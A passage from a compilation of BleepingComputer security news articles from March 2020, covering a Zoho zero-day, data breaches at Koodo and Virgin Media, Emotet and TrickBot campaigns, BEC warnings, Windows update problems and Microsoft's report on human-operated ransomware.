This not only puts the company's who were attacked at risk but also their employees whose data is disclosed.

While companies should not pay a ransom if it could be avoided, even if data is published, they should disclose these attacks as data breaches so employees can protect themselves.

BleepingComputer has contacted the company for a public statement but has not heard back as of yet.


Zoho Fixes No-Auth RCE Zero-Day in ManageEngine Desktop Central
7.3.2020 
Bleepingcomputer  Vulnerebility

Web-based office suite and SaaS services provider Zoho released a security update to fix a remote code execution vulnerability found in its ManageEngine Desktop Central endpoint management solution that does not require authentication to be exploited.

Desktop Central helps companies like managed service providers (MSPs) to manage devices such as servers, laptops, desktops, smartphones, and tablets from a central location, and to automate frequent endpoint management routines like patch installation, OS imaging, remote controlling endpoints, and more.

Zoho patches zero-day impacting thousands of servers
The security flaw caused by deserialization of untrusted data in getChartImage in the FileStorage class, now tracked as CVE-2020-10189, impacts Desktop Central build 10.0.473 and below, and it was fixed by Zoho with the release of build 10.0.479.

Customers using Desktop Central build 10.0.474 and above are also not vulnerable according to Zoho since a short-term fix for the no-auth arbitrary file upload flaw included within build 10.0.474 released on January 20, 2020.

At the moment, over 2,300 ManageEngine Desktop Central servers can be reached over the Internet according to a Shodan scan shared by Microsoft Security Response Center security researcher Nate Warfield.

Seeing that exploiting CVE-2020-10189 allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems, future attacks targeting vulnerable servers could lead to dangerous malware being deployed on networks of companies that haven't yet patched their Desktop Central installations.

https://t.co/cCOrj1t6bo - "only" 2300+ of these online.....

— Nate Warfield (@n0x08) March 5, 2020
Vulnerability disclosed on Twitter without notification
Source Incite security researcher Steven Seeley publicly disclosed the zero-day vulnerability on Twitter on March 5, saying that he decided to do this because Zoho "typically ignores researchers."

"The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data," Seeley's security advisory explains. "An attacker can leverage this vulnerability to execute code under the context of SYSTEM."

The researcher also released a proof of concept showing how potential attackers could exploit the vulnerability on unpatched systems running Zoho's Unified Endpoint Management (UEM).

Since @zoho typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!

Advisory: https://t.co/U9LZPp4l5o
Exploit: https://t.co/LtR75bhooy

— (@steventseeley) March 5, 2020


US Govt Shares Tips to Defend Against Coronavirus Cyber Scams
7.3.2020 
Bleepingcomputer BigBrothers

The Department of Homeland Security's cybersecurity agency today shared tips on how to defend against scammers who use the coronavirus health crisis as bait to push their scams over the Internet.

The Cybersecurity and Infrastructure Security Agency (CISA) warned individuals across the U.S. to remain vigilant for cyber scams related to the Coronavirus Disease 2019 (COVID-19) and to take a number of precautions to make sure that they won't be the victims of cybercriminals.

Defense measures against Coronavirus cyber scams
"Cyber actors may send emails with malicious attachments or links to fraudulent websites to trick victims into revealing sensitive information or donating to fraudulent charities or causes," CISA said.

"Exercise caution in handling any email with a COVID-19-related subject line, attachment, or hyperlink, and be wary of social media pleas, texts, or calls related to COVID-19."

Individuals are encouraged by the cybersecurity agency to:

• Avoid clicking on links in unsolicited emails and be wary of email attachments. See Using Caution with Email Attachments and Avoiding Social Engineering and Phishing Scams for more information.
• Use trusted sources—such as legitimate, government websites—for up-to-date, fact-based information about COVID-19.
• Do not reveal personal or financial information in email, and do not respond to email solicitations for this information.
• Verify a charity’s authenticity before making donations. Review the Federal Trade Commission’s page on Charity Scams for more information.
• Review CISA Insights on Risk Management for COVID-19 for more information.
Coronavirus-themed phishing, scams, and malware
This warning comes after previous ones issued last month by the World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) about ongoing Coronavirus-themed phishing attacks and scam campaigns.

COVID-19 is a highly popular phishing bait for targeting individuals from the United States and the United Kingdom as researchers at IBM X-Force Threat Intelligence, KnowBe4, and Mimecast found in February.

A report from Imperva also highlights how "high levels of concern around the Coronavirus are currently being used to increase the online popularity of spam campaigns designed to spread fake news and drive unsuspecting users to dubious online drug stores."

Coronavirus-themed malware was also discovered by security researchers since January, with security research collective MalwareHunterTeam having previously shared malware samples with Coronavirus references including a Remote Access Trojan (RAT), a Trojan, a stealer/keylogger, and a wiper.

Microsoft, Google, LogMeIn, and Cisco have also announced this week that they are offering free licenses for meeting, collaboration, and remote work tools so that remote workers can join virtual meetings and chat with their colleagues while working remotely from their homes.


FBI Warns of BEC Attacks Abusing Microsoft Office 365, Google G Suite
7.3.2020 
Bleepingcomputer BigBrothers

The US Federal Bureau of Investigation (FBI) warned private industry partners of threat actors abusing Microsoft Office 365 and Google G Suite as part of Business Email Compromise (BEC) attacks.

"The scams are initiated through specifically developed phish kits designed to mimic the cloud-based email services in order to compromise business email accounts and request or misdirect transfers of funds," the FBI said in a Private Industry Notification (PIN) from March 3.

"Between January 2014 and October 2019, the Internet Crime Complaint Center (IC3) received complaints totaling over $2.1 billion in actual losses from BEC scams targeting Microsoft Office 365 and Google G Suite."

BEC scammers in the cloud
The cybercriminals move to cloud-based email services matches organizations' migration to the same services from on-premises email systems.

Targets are redirected to the phishing kits used as part of these BEC attacks via large scale phishing campaigns, with the phishing kits being email service-aware and capable of detecting the "service associated with each set of compromised credentials."

"Upon compromising victim email accounts, cybercriminals analyze the content to look for evidence of financial transactions," the FBI explains.

"Using the information gathered from compromised accounts, cybercriminals impersonate email communications between compromised businesses and third parties, such as vendors or customers."

The scammers will then impersonate employees of the now-compromised organizations or their business partners, attempting to redirect payments between them to bank accounts under the attackers' control.

They will also steal as many partner contacts from the infiltrated email accounts that they can later use to launch other phishing attacks and compromise other businesses, pivoting to other targets within the same industry sector.

FBI Microsoft Office 365 and Google G Suite BEC PIN

BEC defense recommendations
Even though both Microsoft Office 365 and Google G Suite come with security features that can help block BEC scam attempts, many of them have to manually configured and toggled on by IT administrators and security teams.

Because of this, "small and medium-size organizations, or those with limited IT resources, are most vulnerable to BEC scams," the FBI added.

The FBI issued a number of defense recommendations IT admins can implement on their networks to prevent BEC attacks:

• Prohibit automatic forwarding of email to external addresses.
• Add an email banner to messages coming from outside your organization.
• Prohibit legacy email protocols such as POP, IMAP, and SMTP that can be used to circumvent multi-factor authentication.
• Ensure mailbox logon and settings changes are logged and retained for at least 90 days.
• Enable alerts for suspicious activity such as foreign logins.
• Enable security features that block malicious email such as anti-phishing and anti-spoofing policies.
• Configure Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication Reporting and Conformance (DMARC) to prevent spoofing and to validate email.
• Disable legacy account authentication.
End users can also take these measures to defend against BEC scammers:

• Enable multi-factor authentication for all email accounts.
• Verify all payment changes and transactions in-person or via a known telephone number.
• Educate employees about BEC scams, including preventative strategies such as how to identify phishing emails and how to respond to suspected compromises.
The $26 billion scam
The FBI's Internet Crime Complaint Center (IC3) revealed in the 2019 Internet Crime Report published last month that cybercrime was behind individual and business losses of $1.8 billion during the last year alone.

The IC3 also issued a Public Service Announcement (PSA) in September 2019 warning that BEC scams are continuing to grow every year, with victim complaints with a total exposed dollar loss of more than $26 billion between June 2016 and July 2019, and a 100% rise in the identified global exposed losses from May 2018 to July 2019.

Even though quite hard to believe, these numbers are backed by the publicly reported losses with a Toyota Group subsidiary announcing in September 2019 that it was the victim of a BEC scam with an expected financial loss of over $37 million.

Another BEC attack affecting Nikkei, one of the largest media groups in the world, costing the company around $29 million in October 2019.

Also in October 2019, 281 people were arrested in the U.S. and other countries as part of Operation reWired, a globally-coordinated law enforcement to disrupt Business Email Compromise (BEC) schemes.

A previous and similar effort dubbed Operation Wire Wire, announced in June 2018, was the first such enforcement action designed to go after hundreds of BEC scammers and it led to the arrest of 74 individual, as well as the disruption and recovery of roughly $14 million in fraudulent wire transfers.

The FBI recommends BEC scam victims to file a complaint regardless of the amount they lost at BEC.IC3.gov.


Telus-Owned Koodo Mobile Announces Data Breach, Stolen Info for Sale
7.3.2020 
Bleepingcomputer Incindent

Telus-owned Koodo Mobile has suffered a data breach after their systems were hacked and customer data from August and September 2017 was stolen by the attackers.

According to a data breach notification email from Koodo Mobile that was seen by BleepingComputer, their systems were hacked on February 13th, 2020, and an unauthorized person stole customer data from August and September 2017 that contains mobile account numbers and telephone numbers.

"What happened: On February 13, 2020, an unauthorized third party using compromised credentials accessed our systems and copied August/September 2017 data that included your mobility account number and telephone number. It is possible that the information exposed has changed since 2017, in which case your current information is not compromised," the email stated.

This information can be used by scammers to port Koodo Mobile numbers to attacker's devices to receive 2-factor authentication codes, which could allow attackers to gain access to email and bank accounts.

To prevent this, Koodo has enabled the 'Port Protection' feature on the affected accounts, which prevents attackers from porting a Koodo Mobile number to another carrier unless the account holder first calls and requests it to be done.

Koodo customer data being sold online
The email goes on to say that Koodo Mobile has found evidence that the stolen customer information is being sold online, but feels their Port Protection feature will protect their customer's mobile number from being used for fraudulent purposes.

"We have found evidence that the unauthorized third party is offering the information for sale on the dark web. With port protection in place, we do not believe that your information could be used for any fraudulent purposes. Nevertheless, we have reported this incident to Law Enforcement and the Office of the Privacy Commissioner of Canada and we are working closely with them on this matter," the Koodo notification warned.

They then contradict themselves later in the notification by saying that affected users should not use their mobile number for two-factor authentication due to this data breach.

"We also recommend that you not register your mobile telephone number on online accounts. If you have done so, you may want to remove it and use an alternative method to receive One Time Passcodes or 2 Factor Authentication codes," the email continues.

Raveed Laeb of cybersecurity intelligence firm, KELA has told BleepingComputer that Koodo accounts are being sold on various dark web web sites.

"A different market - one that specializes in automated selling of access to compromised accounts - currently offers over 21,000 Koodo accounts," Laeb told BleepingComputer.

Koodo Accounts for sale
Koodo Accounts for sale
Source: KELA
"As can be seen in the image in the third from the right column, this market also indicates the date in which the account was uploaded. Breaking down accounts scraped from the market by date, we can see an uptick in February," Laeb explained.

Monthly amounts of Koodo accounts sold online
Monthly amounts of Koodo accounts sold online
Source: KELA
Unfortunately, with the amount of information leaked by data breaches, it may be too easy for an attacker to find enough information online about a particular customer so that they can bypass the Port Protection feature.

Due to this, it is strongly advised that you use another 2FA method for securing online accounts.

Otherwise, you may run into a similar problem as the one reported by this Koodo customer in the past.

Tweet

Affected users should also be on the lookout for mobile SMS phishing (smishing) scams that pretend to be Koodo and utilize information obtained from this breach.

Update 3/7/20: Added information about Koodo accounts being sold online.


Windows 10 KB4535996 Update Issues: Crashes, Slowdowns, Audio, More
7.3.2020 
Bleepingcomputer OS

Since the release of the Windows 10 KB4535996 cumulative update, Windows users have been reporting numerous problems including boot issues, crashes, performance problems, audio issues, and developer tools no longer working.

The optional Windows 10 KB4535996 cumulative update was released on February 27th, 2020 and while it resolved some Windows Search issues, it also introduced other issues for users who installed the update.

Unfortunately with Windows 10 installed on over 900 million PCs, there are always going to be problems for some users when installing a new update such as Windows not booting, the screen flickers, Cortana is broken, or they can no longer launch programs.

For some, these issues can be resolved by updating to newer drivers or software installed on the computer.

Below are the most common issues Windows 10 users are encountering after installing the KB4535996 option update released on February 27th.

Boot issues and hangs
On two machines that BleepingComputer has installed the KB4535996 update there is a noticeable slowdown before we are shown the login screen after restarting Windows 10.

Before the update, the booting of Windows 10 was quick and would go right into the lock screen. Now there is a few seconds delay during which Windows 10 shows a black screen before displaying the login prompt.

I am lucky, though, as others have reported worse issues [1, 2, 3] such as Windows 10 not starting at all after installing the update.

"On the initial download and install my PC hung at 100% for 5 - 10 mins. Afterwards it hung on the welcome screen after restarts. I recovered the PC by running startup recovery in WinRE, it removed the update. I tried again to install it with the same result. I ran sfc/scannow after both attempts, it found and repaired a few things."

Blue screen crashes at login
One enterprise user reported on the Microsoft forums that after installing the KB4535996 cumulative update almost 200 PCs in their organization would crash with blue screens at the login screen.

"Seeing this issue with about 200 machines. Uninstalling the update doesnt come off cleanly and still gets lock ups on initial boot. "

It should be noted that this may be an outlier or something related to software installed in their organization as I am not seeing many reports like this elsewhere.

Performance issues
One of our readers submitted a tip this week stating that after installing the KB4535996 update, their system has been having performance issues and once they uninstalled the update it worked properly again.

"March 2020 - Installed Microsoft cumulative update KB4535996 on Windows 10 Home 64 bit - caused severe machine slowdown, application and website loading delays. Uninstalled update and problem went away."

Others have also reported similar performance issues [1, 2, 3] where Windows 'stutters', frame rates in games have gone down, and reports of high disk usage or thrashing.

Sound and audio hardware issues
After installing the KB4535996 update, users are reporting [1, 2, 3] that the sound in Windows 10 no longer works.

One user stated that their problem was related to their Sound Blaster USB device no longer being detected by Windows 10.

"After this update my Sound Blaster USB Audio cards stopped working, They would not even show up in the Device Manager yet they were properly connected and worked prior to the update."

Microsoft Visual Studio signtool.exe stops working
Since KB4535996 was released, we have had numerous reports about the Visual Studio code-signing tool signtool.exe no longer working.

Signtool.exe is a program that allows you to digitally sign an executable with a code-signing certificate to indicate that the program comes from a specific publisher and has not been tampered with.

After installing KB4535996, users are reporting that when they use the tool it generates an error code -1073741502.

According to Windows developer Rafael Rivera, this bug is being caused by WTLogConfigCiScriptEvent being removed from wldp.dll.

Rafael Tweet

Microsoft has stated that they are aware of the issue and are working on a resolution for release in mid-March.

"We’re aware of issues with signtool.exe after installing the latest optional update for Windows 10, version 1903 or Windows 10, version 1909 (KB4535996). If you are encountering issues or receiving errors related to signtool.exe, you can uninstall the optional update KB4535996. We are working on a resolution and estimate a solution will be available in mid-March."


Emotet Actively Using Upgraded WiFi Spreader to Infect Victims
7.3.2020 
Bleepingcomputer Virus

Emotet’s authors have upgraded the malware's Wi-Fi spreader by making it a fully-fledged module and adding new functionality as shown by samples recently spotted in the wild.

We previously reported that Emotet is now capable of spreading to new victims via nearby insecure wireless networks using a Wi-Fi worm module.

The recent updates to the module come after the same stand-alone spreader version was used by the Emotet gang for at least two years without noticeable changes as researchers at Binary Defense show in a report shared with BleepingComputer earlier this week.

This upgraded Wi-Fi worm module is already being used in the wild according to a researcher who found evidence of the Emotet Wi-Fi spreader being used to spread throughout one of his client's networks as Binary Defense threat researcher and Cryptolaemus contributor James Quinn told BleepingComputer.

New Emotet Wi-Fi spreader functionality
Besides its conversion from a stand-alone to a malware module, the Emotet developers also updated it with more verbose debugging and made changes that, in theory, could allow the Wi-Fi spreader to deliver other payloads besides the loader — which was the only known payload deliverer by the previous spreader version.

The spreader is now also capable of brute-forcing ADMIN$ shares on targeted networks when it fails brute-forcing a device's C$ share.

"Additionally, before the spreader attempts to brute-force C$/ADMIN$, it attempts to download, from a hardcoded IP, the service binary that it installs remotely," Binary Defense explains. "If this download fails, it sends the debug string “error downloading file” before quitting."

The malware's authors have also tweaked the service.exe binary used to drop Emotet on infected devices, now downloading the loader from the command-and-control (C&C) server and saving it on the compromised computer as firefox.exe, thus making sure that the latest loader version is being deployed.

This method is also used by Emotet developers "to avoid detections that may flag off the Emotet loader, but not the service executable."

Spreader bruteforcing shares
Image: Binary Defense
Binary Defense's research team also observed while analyzing the new Emotet samples that the binary used to deliver the loader and the spreader both featured the loader's hardcoded download URL within their strings, pointing at a previous Emotet version where their functionality was combined within a single binary.

The Emotet authors have also slightly altered the spreader's logging capabilities allowing its operators "to get step-by-step debugging logs from infected victims through the use of a new communication protocol."

This new comms protocol uses two PHP POST arguments delivering info on the bots' MachineGUID and debug strings generated by the malware during runtime.

The Emotet's Wi-Fi spreader module updates are a sign that the malware's authors are now also focusing on adding new infection vectors for their malware loader besides the usual malicious documents delivered to targets via massive spam campaigns.

With the new focus on the spreader, Emotet's authors are on a straight path to developing an even more capable and dangerous Wi-Fi worm module that will most likely be spotted more and more by both researchers and victims while actively in the wild.

Emotet's Wi-Fi spreader in action
Emotet's Wi-Fi spreader in action (Binary Defense)
Emotet infections can lead to serious consequences
Emotet was originally a banking trojan first spotted during 2014 and it has evolved into a malware loader used to install various other malware families including the Trickbot banking Trojan (a known vector for delivering Ryuk ransomware payloads).

Recently, the malware was delivered during late January in a malspam campaign that used the recent Coronavirus global health crisis as bait.

Also in January, the Cybersecurity and Infrastructure Security Agency (CISA) warned of increased activity related to targeted Emotet attacks.

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) also issued a warning on the dangers posed by Emotet attacks, saying that the malware "provides an attacker with a foothold in a network from which additional attacks can be performed, often leading to further compromise through the deployment of ransomware."

Emotet infection chain
Emotet infection chain (CISA)
According to CISA, Emotet infections can lead to very serious outcomes if not immediately addressed including:

• temporary or permanent loss of sensitive or proprietary information,
• disruption to regular operations,
• financial losses incurred to restore systems and files, and
• potential harm to an organization’s reputation.

ACSC provides technical advice on Emotet with best practices to defend against infections, just as CISA does in the Emotet Malware alert issued earlier this year.

Emotet ranked first in a 'Top 10 most prevalent threats' ranking from interactive malware analysis platform Any.Run in December 2019, head and shoulders above the next malware in the top, the Agent Tesla info-stealer, with triple the number of sample uploads submitted for analysis.

More details on Emotet's upgraded Wi-Fi spreader, malware sample hashes, and YARA and SURICATA rules for threat detection are available in the Binary Defense report.


TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails
7.3.2020 
Bleepingcomputer Spam  Virus

A new spam campaign is underway that is preying on the fears of Coronavirus (COVID-19) to target people in Italy with the TrickBot information-stealing malware.

When sending malicious spam, malware distributors commonly use current events, fears, and politics as themes for the emails to get recipients to open the attached malicious documents.

As there is no bigger news at this time than the spread of Coronavirus and the fears of becoming sick, a new malicious spam campaign has been created that pretends to be from a doctor at the World Health Organization (WHO).

These emails have a subject of "Coronavirus: Informazioni importanti su precauzioni" and pretends to be information about the necessary precautions people in Italy should take to protect themselves from the Coronavirus.

Malicious Spam about Coronavirus
Malicious Spam about Coronavirus
The email in Italian can be read below:

Gentile Signore/Signora,

A causa del fatto che nella Sua zona sono documentati casi di infezione dal coronavirus, l'Organizzazione Mondiale della Sanità ha preparato un documento che comprende tutte le precauzioni necessarie contro l'infezione dal coronavirus. Le consigliamo vivamente di leggere il documento allegato a questo messaggio!

Distinti saluti,
Dr. Penelope Marchetti (Organizzazione Mondiale della Sanità - Italia)
This translates to English as:

Dear Sir / Madam,

Due to the fact that cases of coronavirus infection are documented in your area, the World Health Organization has prepared a document that includes all necessary precautions against coronavirus infection. We strongly recommend that you read the document attached to this message!

With best regards,
Dr. Penelope Marchetti (World Health Organization - Italy)
According to new research by Sophos, attached to these emails is a malicious Word document that when opened states that you need to click on the 'Enable Content' button to properly view it.

Malicious Word document
Malicious Word document
Once a recipient clicks on 'Enable Content', though, malicious macros will be executed that extracts various files to install and launch the Trickbot malware as illustrated in the image below by Sophos.

From email to TrickBot infection
From email to TrickBot infection
(Source: Sophos)
Once TrickBot is installed, it will harvest various information from a compromised computer and then attempt to spread laterally throughout a network to gather more data.

To perform this behavior, TrickBot will download various modules that perform specific behavior such as stealing cookies, browser information, OpenSSH keys, steal the Active Directory Services database, and spreading to other computers.

After harvesting the network of all valuable data, TrickBot will eventually launch PowerShell Empire or Cobalt Strike to give the Ryuk Ransomware actors access to the infected computer.

After these actors perform further reconnaissance of the network, steal data, and gain admin credentials, they will deploy the Ryuk Ransomware and encrypt the files of all the computers on the network.

This is why TrickBot is such a dangerous computer infection as it uses a two-fold attack, with both attacks causing serious damage to your files and personal data.

People need to be suspicious of all emails that they receive and not open any attachment from someone they do not know without first confirming the email is legitimate. This can be done by calling the sender directly and confirming or by scanning the attachment with antivirus software or VirusTotal.

In heightened times of unrest and concern, users need to be even more diligent as there are always people looking to take advantage of a crisis to cause harm to another.


Windows 10 Insider Build 19577 Released With New Windows Security Icon
7.3.2020 
Bleepingcomputer OS

Microsoft has released Windows 10 Insider Preview Build 19577 to Insiders in the Fast ring, which includes the new Windows Security Fluent-based icon and diagnostic data changes.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19577 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19577

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

Diagnostic data changes in Settings
Microsoft is changing the labeling of their diagnostic options in the 'Diagnostics & feedback' settings.

The 'Basic' settings will now be labeled 'Required' and the current 'Full' option will be renamed to 'Optional'.

If business users set their diagnostics setting to Option, Microsoft will be releasing new Group Policies that will allow you to have more granular control over what data is collected in your organization.

More new icons: Windows Security
Microsoft has been releasing Fluent-based icons for various programs and apps such as File Explorer, OneDrive, Mail, Calendar, and Your Phone.

With this build, Microsoft is now releasing the new icon for Windows Security, which looks far nicer than the original in my opinion.

The new Windows Security icon as it appears on the taskbar.

The new Windows Security icon as it appears on the taskbar.

Other changes
Other changes in this build include:

Cortana gets assistant conversations that allow you to talk to Cortana in a more conversational format and ask things such as “tell me a dad joke”, “tell me a bedtime story”, or “rock, paper, scissors.”
Microsoft has updated the behavior of Advanced startup (Settings > Update & Security > Recovery > Advanced startup “Restart now”) to enable some Ease of Access features to work properly. Now Advanced startup will boot directly into the Windows Recovery Environment.
Microsoft continues their experiment with the new Windows 10 Optional Update experience and has extended it to run through March.


US Govt Adds Stricter Requirements for .gov Domain Registration
7.3.2020 
Bleepingcomputer BigBrothers

The U.S. government will start requiring notarized signatures as part of the registration process for .gov domains starting March 10, 2020, to prevent wire and mail fraud that might lead to such domains being registered by unauthorized organizations or individuals.

The U.S. General Services Administration (GSA) oversees the DotGov Program that operates the .GOV top-level domain (TLD) and it makes such domains available to US-based government organizations, from local municipalities to federal agencies.

Security boost for .gov domain registration
"Effective on March 10, 2020, the DotGov Program will begin requiring notarized signatures on all authorization letters when submitting a request for a new .gov domain," the DotGov Registrar says.

"This is a necessary security enhancement to prevent mail and wire fraud through signature forgery in obtaining a .gov domain.

"This step will help maintain the integrity of .gov and ensure that .gov domains continue to be issued only to official U.S. government organizations."

To request a .gov domain name, government organizations have to prepare and send an authorization letter and fill an online form after receiving a .gov registrar account.

This letter must use official letterhead stationary and it has to include a signature from the requesting organization’s authorizing authority the DotGov Program site explains.

This is the letter that will need to come with a notarized signature starting March 10, 2020, to prevent future attempts of registering .gov domains without authorization.

Anyone could register a .gov domain
The GSA says that .gov domains are exclusively granted to U.S. government organizations and they give legitimacy to government websites and online tools, ensuring the customers' trust that the content is from an official source.

However, as independent investigative journalist Brian Krebs previously reported, until the new rules are enacted, almost anyone can register a .gov domain using fake information on the authorization letter required by the GSA albeit illegally and with the risk of being indicted for wire or mail fraud if caught.

A researcher confirmed that this was possible saying that he was able to register a .gov in November 2019 using a fake Google Voice number, and a Gmail address, as well as official letterhead extracted from a legitimate government organization's documents.

"I never said it was legal, just that it was easy," the researcher said. "I assumed there would be at least ID verification. The deepest research I needed to do was Yellow Pages records."

When contacted, the GSA said that it "has already implemented additional fraud prevention controls," without detailing what were the measures taken to prevent future fraudulent .gov registration attempts.

The Cybersecurity and Infrastructure Security Agency (CISA) shared plans to take over the management of the .gov TLD from the GSA since "the .gov top-level domain (TLD) is critical infrastructure for thousands of federal, state and local government organizations across the country."

A bipartisan bill known as the "DOTGOV Act of 2019" and sponsored by US Senator Gary Peters was introduced in Senate on October 30, 2019, seeking, among other things, to provide CISA with the authority to manage the .gov TLD after assuming governance from the GSA.


Microsoft Issues Fix for Windows 10 Drivers Blocked by Core Isolation
7.3.2020 
Bleepingcomputer  OS

Microsoft has issued guidance on how to resolve problems loading drivers in Windows 10 that are being blocked due to virtualization-based security protections.

If your PC has a 64-bit processor and supports Intel VT-X or AMD-v virtualization, which is available in most modern CPUs, then Windows 10 offers extra virtualization-based security features.

One of these features is called Core Isolation, which uses hardware virtualization to isolate critical parts of the operating system's kernel from user-mode drivers and software running on the PC. When enabled, this prevents malware or exploits from gaining access to the secure kernel to bypass security controls, inject malware, or perform other malicious behavior.

A subset of the Core Isolation feature is a feature called 'Memory Integrity', which protects memory from being injected with malicious code by malware or malicious attacks.

"Memory integrity is a feature of Windows that ensures code running in the Windows kernel is securely designed and trustworthy. It uses hardware virtualization and Hyper-V to protect Windows kernel mode processes from the injection and execution of malicious or unverified code. The integrity of code that runs on Windows is validated by memory integrity, making Windows resistant to attacks from malicious software."

Memory Integrity may block drivers
When enabled, this feature locks down the computer and may cause drivers to not operate properly or even load.

In a new support bulletin, Microsoft explains that bugs or a minor and usually harmless vulnerability in a driver may cause the Memory Integrity feature to block it from loading.

When the driver is not loaded properly, Windows will log an error that states "A driver can't load on this device", which could lead to issues ranging from harmless to severe depending on the driver.

In situations like this, Microsoft recommends that you check for an updated driver that may have fixed the issue causing it to be blocked.

If that does not help, you can disable the Memory Integrity security feature so that the driver can load.

To disable Memory Integrity, please follow these steps:

Open the Core Isolation page by going to Start > Settings > Update & Security > Windows Security > Device Security and then under Core isolation, click on Core isolation details.

Alternatively, you can click on this link in Windows 10 to open the Core Isolation settings page
Core Isolation Settings
Core Isolation Settings
When the Core Isolation settings page opens, toggle the Memory integrity setting to Off. Once you turn it off, Windows 10 will prompt you to restart your computer.
Prompt to restart Windows
Prompt to restart Windows
Restart your computer and the Memory Integrity feature will be turned off.
At this point, you should check if there are still issues loading the driver.

If the issue persists, you should contact your hardware manufacturer to find out if an updated driver will be made available soon.


Virgin Media Data Breach Exposes Info of 900,000 Customers
7.3.2020 
Bleepingcomputer  Incindent

Virgin Media announced today that the personal information of roughly 900,000 of its customers was accessed without permission on at least one occasion because of a misconfigured and unsecured marketing database.

Virgin Media is a leading cable operator in the U.K. and Ireland, and it delivered 14.6 million broadband, video, and fixed-line telephony services to approximately 6.0 million cable customers, as well as mobile services to 3.3 million subscribers at December 31, 2019, according to the company's preliminary Q4 2019 results.

Database exposed for almost a year
According to an ongoing investigation, Virgin Media discovered on February 28, 2020, that the exposed database was accessible from at least April 19, 2019, and it was recently accessed by an unauthorized party at least once although the company doesn't know "the extent of the access or if any information was actually used."

Lutz Schüler, CEO of Virgin Media, said in a press release that the company "immediately solved the issue by shutting down access to this database, which contained some contact details of approximately 900,000 people, including fixed-line customers representing approximately 15% of that customer base."

"The database did not include any passwords or financial details, such as credit card information or bank account numbers, but did contain limited contact information such as names, home, and email addresses and phone numbers," he added.

We are now contacting those affected to inform them of what happened. We urge people to remain cautious before clicking on an unknown link or giving any details to an unverified or unknown party. - Lutz Schüler, CEO of Virgin Media

Exposed customer information
The database was used to store and manage information on existing and potential Virgin Media customers and it included:

• contact details (such as name, home and email addresses, and phone numbers)

• technical and product information

• customers' dates of birth (in a very small number of cases)

"Please note that this is all of the types of information in the database, but not all of this information may have related to every customer," Virgin Media says.

The company also says that the unsecured database was not used to store customer passwords or financial details, like bank account numbers or credit card information.

Virgin Media advises customers who think that they might have been victims of identity theft to reach out to their bank or credit card company to inform them of any out of ordinary transactions or applications made in their name without their knowledge.

Customers were also warned over e-mail that they might be targeted by phishing attacks, fraud, or nuisance marketing communications.

Earlier today, T-Mobile also announced a data breach caused by an email vendor that got hacked and exposed the personal and financial info of some of its customers.


Microsoft Shares Tactics Used in Human-Operated Ransomware Attacks
7.3.2020 
Bleepingcomputer  Ransomware

Microsoft today shared tips on how to defend against human-operated ransomware attacks known to be behind hundreds of millions of dollars in losses following campaigns targeting enterprises and government entities.

Ransomware families such as Sodinokibi (REvil), Samas, Bitpaymer, DoppelPaymer, Dharma, and Ryuk are deployed by human operators, which makes these attacks a lot more dangerous than auto-spreading ransomware like NotPetya, WannaCry, or those installed via malware and phishing attacks.

This is because the actors that manually infiltrate an organization's IT infrastructure can adapt to the challenges posed by security defenses and can use a variety of techniques to further infiltrate the targeted environments using techniques such as privilege escalation and credential dumping.

"They exhibit extensive knowledge of systems administration and common network security misconfigurations, perform thorough reconnaissance, and adapt to what they discover in a compromised network," the Microsoft Defender Advanced Threat Protection (ATP) Research Team says.

"They take advantage of similar security weaknesses, highlighting a few key lessons in security, notably that these attacks are often preventable and detectable."

Microsoft shared information on the different entrance vectors and post-exploitation methods used by the operators behind DoppelPaymer, Dharma, and Ryuk, and showed that there's an overwhelming overlap in the security misconfigurations they abuse as part of their devastating attacks.

To show the actual impact ransomware had on its victims, after analyzing collected ransomware ransom notes and cryptocurrency wallets, the FBI said at last week's RSA security conference that victims have paid more than $140 million to ransomware operators during the past six years.

Ryuk ransomware deployment techniques and tactics
Ryuk is the most dangerous ransomware family out of the three highlighted by Microsoft, with the FBI saying that its operators were able to collect over $61 million in ransoms from their victims — this total is definitely a lot larger considering that the agency did not have access to all of the Ryuk ransom notes and wallets.

This ransomware family is one of the potential malware payloads delivered onto systems infected with the Trickbot Trojan.

"At the beginning of a Ryuk infection, an existing Trickbot implant downloads a new payload, often Cobalt Strike or PowerShell Empire, and begins to move laterally across a network, activating the Trickbot infection for ransomware deployment," Microsoft explains.

Also, the operators will not immediately deploy the ransomware payload on the victims' networks after the Trickbot infections occur but they will instead wait weeks or even months after the infiltration has started.

This happens because, in a lot of cases, the targets will either completely ignore the initial Trickbot infection as it is seen as a low-priority threat and that allows them to collect a lot more data and information.

Once the attack starts, the actors will start a network surveillance process and will attempt to move laterally throughout the network using Cobalt Strike or PowerShell to collect info for credential theft.

Ryuk ransom note

Ryuk attack chain
"The attackers then continue to move laterally to higher-value systems, inspecting and enumerating files of interest to them as they go, possibly exfiltrating this data," Microsoft adds. "The attackers then elevate to domain administrator and utilize these permissions to deploy the Ryuk payload."

"The Ryuk operators use stolen Domain Admin credentials, often from an interactive logon session on a domain controller, to distribute the Ryuk payload.

"They have been seen doing this via Group Policies, setting a startup item in the SYSVOL share, or, most commonly in recent attacks, via PsExec sessions emanating from the domain controller itself."

Dharma and DoppelPaymer TTPs
One of the groups that use Dharma ransomware in their attacks (a group tracked as PARINACOTA by Microsoft) is highly active and it has been observed by the Redmond researchers deploying the ransomware on the systems of at least three or four organizations every week.

Microsoft says that during 18 months of monitoring, PARINACOTA was observed while changing "tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks."

This group's operators will most commonly use brute force attacks against servers reachable over the internet via the Remote Desktop Protocol (RDP).

After it infiltrates an organization's network, they will start scanning for other RDP servers and brute force their way into those too, turning off security controls and moving laterally to other systems after a network reconnaissance stage.

